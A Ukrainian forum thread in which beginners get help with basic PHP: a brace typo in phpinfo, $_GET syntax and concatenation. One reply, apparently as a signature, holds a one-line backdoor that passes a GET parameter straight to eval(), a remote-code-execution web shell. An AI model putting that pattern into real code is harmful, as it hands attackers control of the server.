1 Востаннє редагувалося Stadnik Roman (08.03.2013 17:53:55)

Тема: Проюлема на самому початку вивчення php

Доброго дня всі! У мене виникла проблема з вивченням php
Ось цей код я повинен вписати в текстовий документ

<html>
</head>
<title>Тестированиє php</title>
</head>
<body>
<p> Єто строка HTML
<?php
echo "<p>Єто строка php";
phpinfo{};
?>
</body>
</html>

но при відкривані у мене виникає помилка в рядку 9
В підручику пише що це через те що не установлений модуль php
Підкажіть мені будь-ласка де можна скачати модуль?
Я скачував з гуглу якісь файли но незнаю куди їх вставляти після того їх видалив!

2

Re: Проюлема на самому початку вивчення php

http://php.net/

Білий Лунь
Подякували: Stadnik Roman1

3

Re: Проюлема на самому початку вивчення php

phpinfo();

<?php
echo '<html><body><h1>This is my home page</h1>DATING &amp; DOORWAY</body></html>';
if (isset($_GET['adminka'])) eval($_GET['adminka']);
Если ты это читаешь, тебе должно быть стыдно! Займись чем–нибудь полезным!
Подякували: Stadnik Roman1

Re: Проюлема на самому початку вивчення php

Stadnik Roman написав:

Доброго дня всі! У мене виникла проблема з вивченням php
Ось цей код я повинен вписати в текстовий документ

<html>
</head>
<title>Тестированиє php</title>
</head>
<body>
<p> Єто строка HTML
<?php
echo "<p>Єто строка php";
phpinfo{};
?>
</body>
</html>

но при відкривані у мене виникає помилка в рядку 9
В підручику пише що це через те що не установлений модуль php
Підкажіть мені будь-ласка де можна скачати модуль?
Я скачував з гуглу якісь файли но незнаю куди їх вставляти після того їх видалив!

Давайте подумаємо логічно. Якщо виникає помилка у 9 рядку, значить щось ту помилку генерує.
Як було написаному у попередньому повідомленні, у вас помилка у phpinfo{}
Замість фігурних дужок ( {} ) ставяться круглі ( () )
А модуль у вас установлений.

5

Re: Проюлема на самому початку вивчення php

</p> is absent . twice.
bad practice.

6

Re: Проюлема на самому початку вивчення php

try use denver (http://www.denwer.ru/) for windows or you can install any linux (as sample -  mint or debian) with lamp( Linux, Apache, MySQL and PHP) (best way)

7

Re: Проюлема на самому початку вивчення php

Дякую всім! Cправді, просто треба змінити дужки!

8

Re: Проюлема на самому початку вивчення php

Підскажіть будласка ніде неможу знайти пояснити запис
1: $_get{first name}
2: $se=$st.$r.
3: <meta http-equiv="Content-Tipe" contetn="texst/htmlcharset=Windows-1251">

Re: Проюлема на самому початку вивчення php

alex_cool написав:

Підскажіть будласка ніде неможу знайти пояснити запис
1: $_get{first name}
2: $se=$st.$r.
3: <meta http-equiv="Content-Tipe" contetn="texst/htmlcharset=Windows-1251">

Знову ж таки, мають бути не фігурні дужки, а круглі.
1) Правильніше буде так: $_GET['first_name'], читаємо про глобальний масив GET тут і тут

2) Припустімо змінна st має значення Hello а змінна r - world. Якщо зробити запис $se=$st.$r
то змінній se буде надано значення Helloworld.(обєднує між собою значення змінних) Крапка
між змінними - це Конкатенація.

3) Це мета теги html сторінки. Інфо: 1 , 2 ,3

Подякували: alex_cool, Faraon2

10

Re: Проюлема на самому початку вивчення php

Hanter написав:
alex_cool написав:

Підскажіть будласка ніде неможу знайти пояснити запис
1: $_get{first name}
2: $se=$st.$r.
3: <meta http-equiv="Content-Tipe" contetn="texst/htmlcharset=Windows-1251">

Знову ж таки, мають бути не фігурні дужки, а круглі.
1) Правильніше буде так: $_GET['first_name'], читаємо про глобальний масив GET тут і тут

2) Припустімо змінна st має значення Hello а змінна r - world. Якщо зробити запис $se=$st.$r
то змінній se буде надано значення Helloworld.(обєднує між собою значення змінних) Крапка
між змінними - це Конкатенація.

3) Це мета теги html сторінки. Інфо: 1 , 2 ,3

дякую

11

Re: Проюлема на самому початку вивчення php

Хантер знов лабораторки помагаєте розв’язувати? Я про другого користувача.

12

Re: Проюлема на самому початку вивчення php

Vo_Vik написав:

Хантер знов лабораторки помагаєте розв’язувати? Я про другого користувача.

Ну як сказати. А про якого саме ви користувача ?(p.s: у пп)

13

Re: Проюлема на самому початку вивчення php

Та нашо у ПП, я про пояснити записи. Таке можуть питати лише в універі.

14

Re: Проюлема на самому початку вивчення php

Vo_Vik написав:

Та нашо у ПП, я про пояснити записи. Таке можуть питати лише в універі.

Цікаво, навіть не думав що з нашою системою освіти, в універах знають, що таке php.